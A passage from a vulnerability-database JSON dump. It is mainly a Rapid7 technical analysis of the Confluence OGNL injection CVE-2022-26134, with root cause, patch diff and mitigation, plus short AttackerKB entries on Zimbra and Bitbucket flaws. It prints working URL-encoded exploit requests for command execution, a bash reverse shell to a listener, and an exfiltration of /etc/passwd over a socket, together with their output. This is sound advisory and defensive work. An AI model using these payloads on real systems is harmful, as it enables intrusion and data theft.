'self'\n < X-Cmd-Response: confluence \n < Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n < Content-Type: text/html;charset=UTF-8\n < Content-Length: 0\n < Date: Thu, 02 Jun 2022 23:28:23 GMT\n < \n * Connection #0 to host 10.0.0.28 left intact\n \n\nDecoding the exploit in the `curl` request shows how this is achieved. The exploit saves the output of the `exec` call and uses `setHeader` to include the result in the server\u2019s response to the attacker.\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"whoami\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}\n \n\n### Root cause\n\nOur investigation led to the following partial call stack. 
The call stack demonstrates the OGNL injection starting from `HttpServlet.service` to `OgnlValueStack.findValue` and beyond.\n \n \n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)\n at ognl.SimpleNode.getValue(SimpleNode.java:193)\n at ognl.Ognl.getValue(Ognl.java:333)\n at ognl.Ognl.getValue(Ognl.java:310)\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at 
com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n \n\n`OgnlValueStack` [findValue(str)](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) is important as it is the starting point for the OGNL expression to be evaluated. As we can see in the call stack above, `TextParseUtil.class` invokes `OgnlValueStack.findValue` when this vulnerability is exploited.\n \n \n public class TextParseUtil {\n public static String translateVariables(String expression, OgnlValueStack stack) {\n StringBuilder sb = new StringBuilder();\n Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n String str1, g = m.group(1);\n int start = m.start();\n try {\n Object o = stack.findValue(g);\n str1 = (o == null) ? 
\"\" : o.toString();\n } catch (Exception ignored) {\n str1 = \"\";\n } \n sb.append(expression.substring(previous, start)).append(str1);\n previous = m.end();\n } \n if (previous < expression.length())\n sb.append(expression.substring(previous)); \n return sb.toString();\n }\n }\n \n\n`ActionChainResult.class` calls `TextParseUtil.translateVariables` using `this.namespace` as the provided expression:\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\nWhere `namespace` is created from the request URI string in `com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath`:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nThe result is that the attacker-provided URI will be translated into a namespace, which will then find its way down to OGNL expression evaluation. At a high level, this is very similar to [CVE-2018-11776](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_namespace_ognl.rb>), the Apache Struts2 namespace OGNL injection vulnerability. Just a reminder that there is nothing new in this world.\n\n### The patch\n\nOn June 3, 2022, Atlassian directed customers to replace `xwork-1.0.3.6.jar` with a newly released `xwork-1.0.3-atlassian-10.jar`. The xwork jars contain the `ActionChainResult.class` and `TextParseUtil.class` we identified as the path to OGNL expression evaluation.\n\nThe patch makes a number of small changes to fix this issue. 
For one, `namespace` is no longer passed down to `TextParseUtil.translateVariables` from `ActionChainResult.execute`:\n\n**Before:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\n**After:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n String finalNamespace = this.namespace;\n String finalActionName = this.actionName;\n \n\nAtlassian also added `SafeExpressionUtil.class` to the `xwork` jar. `SafeExpressionUtil.class` provides filtering of unsafe expressions and has been inserted into `OgnlValueStack.class` in order to examine expressions when `findValue` is invoked. For example:\n \n \n public Object findValue(String expr) {\n try {\n if (expr == null)\n return null; \n if (!this.safeExpressionUtil.isSafeExpression(expr))\n return null; \n if (this.overrides != null && this.overrides.containsKey(expr))\n \n\n### Payloads\n\nThe OGNL injection primitive gives attackers many options. Volexity\u2019s excellent **[Zero-Day Exploitation of Atlassian Confluence](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)** discusses JSP webshells being dropped to disk. However, Confluence Server should typically execute as `confluence` and not `root`. The `confluence` user is fairly restricted and unable to introduce web shells (to our knowledge).\n\nJava does otherwise provide a wide variety of features that aid in achieving and maintaining execution (both with and without touching disk). 
It\u2019s impossible to demonstrate all here, but a reverse shell routed through Java\u2019s [Nashorn](<https://docs.oracle.com/javase/10/nashorn/introduction.htm#JSNUG136>) engine is, perhaps, an interesting place for others to explore.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/\n \n\nDecoded, the exploit looks like the following:\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()\")}\n \n\nAnd results in a reverse shell:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37148\n bash: cannot set terminal process group (34470): Inappropriate ioctl for device\n bash: no job control in this shell\n bash: /root/.bashrc: Permission denied\n confluence@ubuntu:/opt/atlassian/confluence/bin$ id\n id\n uid=1001(confluence) gid=1002(confluence) groups=1002(confluence)\n confluence@ubuntu:/opt/atlassian/confluence/bin$\n \n\nOf course, shelling out can be highly risky for attackers if the victim is running some type of threat detection software. Executing in memory only is least likely to get an attacker caught. 
As an example, we put together a simple exploit that will read `/etc/passwd` and exfiltrate it to the attacker without shelling out.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/\n \n\nWhen decoded, the reader can see that we again have relied on the Nashorn scripting engine.\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}\n \n\nAgain, the attacker is listening for the exfiltration, which looks, as you\u2019d expect, like `/etc/passwd`:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37162\n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n \u2026 truncated \u2026\n \n\nFinally, note that the exploit could be entirely URI-encoded as well. 
Writing any type of detection logic that relies on **just** the ASCII form will be quickly bypassed.\n\n## Mitigation guidance\n\nAtlassian released patches for CVE-2022-26134 on June 3, 2022. A full list of fixed versions is available in the [advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). A temporary workaround for CVE-2022-26134 is also available\u2014note that the workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\nOrganizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately. We recommend that all organizations consider implementing IP address safelisting rules to restrict access to Confluence.\n\nIf you are unable to apply safelist IP rules to your Confluence server, consider adding WAF protection. Based on the details published so far, we recommend adding Java deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. 
For example, see the `JavaDeserializationRCE_BODY`, `JavaDeserializationRCE_URI`, `JavaDeserializationRCE_QUERYSTRING`, and `JavaDeserializationRCE_HEADER` rules described [here](<https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs>).\n\n## Rapid7 customers\n\n**InsightVM and Nexpose:** Customers can assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks as of June 3, 2022:\n\n * A remote check (atlassian-confluence-cve-2022-26134-remote) available in the 3:30 PM EDT content-only release on June 3\n * A remote _version_ check (atlassian-confluence-cve-2022-26134) available in the 9 PM EDT content-only release on June 3\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR's built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Confluence Java App Launching Processes\n\nThe Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n**tCell:** Customers leveraging the Java App Server Agent can protect themselves from exploitation by using the OS Commands block capability. For customers leveraging a Web Server Agent, we recommend creating a block rule for any URL path starting with `${` or `%24%7B`.\n\n## Updates\n\n**June 3, 2022 11:20 AM EDT:** This blog has been updated to reflect that all supported versions of Confluence Server and Confluence Data Center are affected, and it's likely that **all versions** (including LTS and unsupported) are affected, but Atlassian has not yet determined the earliest vulnerable version.\n\n**June 3, 2022 11:45 AM EDT:** Atlassian has released a temporary workaround for CVE-2022-26134. The workaround must be manually applied. 
Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\n**June 3, 2022 1:15 PM EDT:** Atlassian has released patches for CVE-2022-26134. A full list of fixed versions is [available in their advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). Rapid7 recommends applying patches OR the temporary workaround (manual) on an **emergency basis.**\n\n**June 3, 2022 3:15 PM EDT:** A full technical analysis of CVE-2022-26134 has been added to this blog to aid security practitioners in understanding and prioritizing this vulnerability. A vulnerability check for InsightVM and Nexpose customers is in active development with a release targeted for this afternoon.\n\n**June 3, 2022 3:30 PM EDT:** InsightVM and Nexpose customers can assess their exposure to CVE-2022-26134 with a remote vulnerability check in today's (June 3, 2022) content release.\n\n**June 6, 2022 10 AM EDT:** A second content release went out the evening of Friday, June 3 containing a remote version check for CVE-2022-26134. This means InsightVM and Nexpose customers are able to assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks.\n\nAttacker activity targeting on-premise instances of Confluence Server and Confluence Data Center has continued to increase. 
Organizations that have not yet applied the patch or the workaround should **assume compromise** and activate incident response protocols in addition to remediating CVE-2022-26134 on an emergency basis.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T23:27:15", "type": "rapid7blog", "title": "Active Exploitation of Confluence CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-06-02T23:27:15", "id": "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "href": "https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-06-03T17:15:08", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. 
An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 19, 2022 4:18pm UTC reported:\n\nThis is really bad \u2013 remote root on an organization\u2019s email server, if combined with other (currently 0-day vulnerabilities). Patch ASAP!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T00:00:00", "type": "attackerkb", "title": "CVE-2022-27925", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-11-03T00:00:00", "id": "AKB:48EF6C32-59B4-4AD7-BE9A-0EE8A2E86072", "href": "https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:15:07", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. 
When the candidate has been publicized, the details for this candidate will be provided.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 23, 2022 4:47pm UTC reported:\n\nThis is a privilege-escalation vulnerability in Zimbra, to go from the `zimbra` user to `root`. As of writing, this has been publicly known for nearly a year, and reported to Zimbra for about a month.\n\nAlthough it requires an account, there have been a whole pile of recent CVEs that get you there \u2013 [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis>), [CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>), and [CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2022-37393", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-30333", "CVE-2022-37393"], "modified": 
"2022-08-16T00:00:00", "id": "AKB:519DD30E-F9A7-4A5E-A57B-DF4E4B9B20F1", "href": "https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:45:19", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands become unescaped, causing an overwrite of arbitrary cached entries.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 16, 2022 8:10pm UTC reported:\n\nUltimately, this is annoying and unreliable to exploit, but we did get it working and confirm it\u2019s a problem.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2022-27924", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-30333"], "modified": "2022-08-16T00:00:00", "id": "AKB:C83F5B74-AC72-42D5-A71F-C8F4144C4C9D", "href": 
"https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:15:00", "description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 23, 2022 4:43pm UTC reported:\n\nThis is basically [cve-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>) \u2013 it\u2019s the same exploit, but you don\u2019t send an auth cookie and it fails to prevent access.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-37042", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-11-03T00:00:00", "id": "AKB:042573E7-4FF2-4D52-842B-E72379F0C4D0", "href": "https://attackerkb.com/topics/BLL1VR8x6z/cve-2022-37042", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:14:34", "description": "Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at September 20, 2022 9:03pm UTC reported:\n\nVery easy patch to reverse and exploit to develop. A public proof of concept exists, as well as a Metasploit module. 
Very important to patch!\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "attackerkb", "title": "CVE-2022-36804", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-30333", "CVE-2022-36804"], "modified": "2022-09-21T00:00:00", "id": "AKB:A5F9A5B4-EEF8-4409-9D1D-846536B8D033", "href": "https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T02:14:56", "description": "An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). 
Once pax is installed, amavisd automatically prefers it over cpio.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at October 06, 2022 9:31pm UTC reported:\n\nThis is I think the 6th major issue with Zimbra this year. It\u2019s not really their fault, they use Amavis which uses `cpio` which is vulnerable to CVE-2015-1197, but the attack surface for incoming emails is HUGE.\n\nNot to mention, this is one of several vulnerabilities this year that was being exploited in the wild before being discovered, which means Zimbra is an active target for the Bad Guys.\n\nIf you\u2019re still using Zimbra, you might want to seriously reconsider. I betcha there are others, and they\u2019re probably being exploited.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-41352", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1197", "CVE-2022-30333", "CVE-2022-37393", "CVE-2022-41352"], "modified": 